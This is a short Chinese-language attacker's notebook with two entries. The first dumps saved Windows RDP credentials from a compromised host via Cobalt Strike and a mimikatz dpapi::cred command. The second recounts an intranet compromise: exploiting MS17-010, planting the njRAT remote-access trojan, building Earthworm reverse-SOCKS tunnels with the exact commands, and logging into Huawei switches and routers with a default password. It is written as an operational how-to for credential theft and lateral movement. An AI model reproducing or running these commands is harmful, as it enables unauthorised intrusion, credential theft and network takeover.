获取远程主机保存的RDP凭据密码
拿下一台运维机,上了个CS,发现曾经连接过几台服务器并且保存了凭据,网上查了圈发现CS不支持交互式mimikatz,记录下获取远程主机RDP凭据。
Windows保存RDP凭据的目录是C:\Users\用户名\AppData\Local\Microsoft\Credentials
可通过命令行获取,执行: cmdkey /list或powerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force注意:cmdkey /list命令务必在Session会话下执行,system下执行无结果。
使用cobalt strike中的mimikatz可以获取一部分接下来要用到的masterkey和pbData
mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID
输出应类似
**BLOB** dwVersion : 00000001 - 1 ...
复盘从一个监控主机到核心路由沦陷
在对内网进行ms17-010扫描时,发现2台之前没有出现过且没有打补丁的主机,于是,尝试了一波
kali主机在扫描时发现2台之前没有出现过且没有打补丁的主机
尝试打了一波
然后种了个njrat
翻文件的时候发现了点配置文件
down下来解压后发现是交换机的配置文件,于是有了一个大胆的想法
查看了被控主机的网络连接后,发现一个地址无法ping通,TCP包也无法到达,推测做了ACL
于是在被控机上搭了earthworm做转发
本机执行ew -s rcsocks -l 本地代理端口 -e 远端连接端口
被控机执行ew -s rssocks -d 主控机IP -e 远端连接端口
然后开启proxifier的代理功能,成功访问了那个系统,但这不是主要目的
在咨询了好哥们后,他建议尝试搞搞交换机看看
在对10.2.66/24网段扫描后发现10.2.66.254开放了80和23端口,尝试xshell连接
成功使用huawei密码huawei@1234连接,继续翻上级路由
发现了10.2.20.1
继续telnet
继续翻
发现10.2.20.58
继续翻,翻到 ...